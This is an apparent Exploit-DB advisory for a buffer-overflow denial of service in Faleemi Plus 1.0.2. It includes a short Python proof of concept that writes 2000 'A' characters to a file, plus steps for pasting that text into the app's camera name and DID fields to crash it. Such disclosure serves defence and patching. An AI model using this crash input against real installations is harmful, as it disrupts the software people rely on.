Vendor: Faleemi Plus
By: Gionathan 'John' Reale
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 119
Product Name: Faleemi Plus
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:faleemi:faleemi_plus:1.0.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

Faleemi Plus 1.0.2 – Denial of Service (PoC)

A buffer overflow vulnerability exists in Faleemi Plus 1.0.2 that could allow an attacker to cause a denial of service condition. The proof-of-concept Python script creates a new file named 'exploit.txt'. The text inside 'exploit.txt' is copied and the program is started. After clicking 'Add Camera', pasting the content of 'exploit.txt' into the 'Camera name' and 'DID number' fields causes a crash.

Mitigation:

Upgrade to the latest version of Faleemi Plus.

Exploit-DB raw data:

# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC)  
# Author: Gionathan "John" Reale
# Discovery Date: 2018-09-14
# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
# Tested Version: 1.0.2
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Now click "Add Camera" and in the new 
# window paste the content of "exploit.txt" into the following fields:
# "Camera name" & "DID number". Click "Add" and you will see a crash.

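#!/usr/bin/python3

# 2000 "A" characters used as the oversized field input
buffer = "A" * 2000

payload = buffer
try:
    # Write the payload to exploit.txt in the current directory
    with open("exploit.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except OSError:
    # Raised when the file cannot be opened or written
    print("File cannot be created")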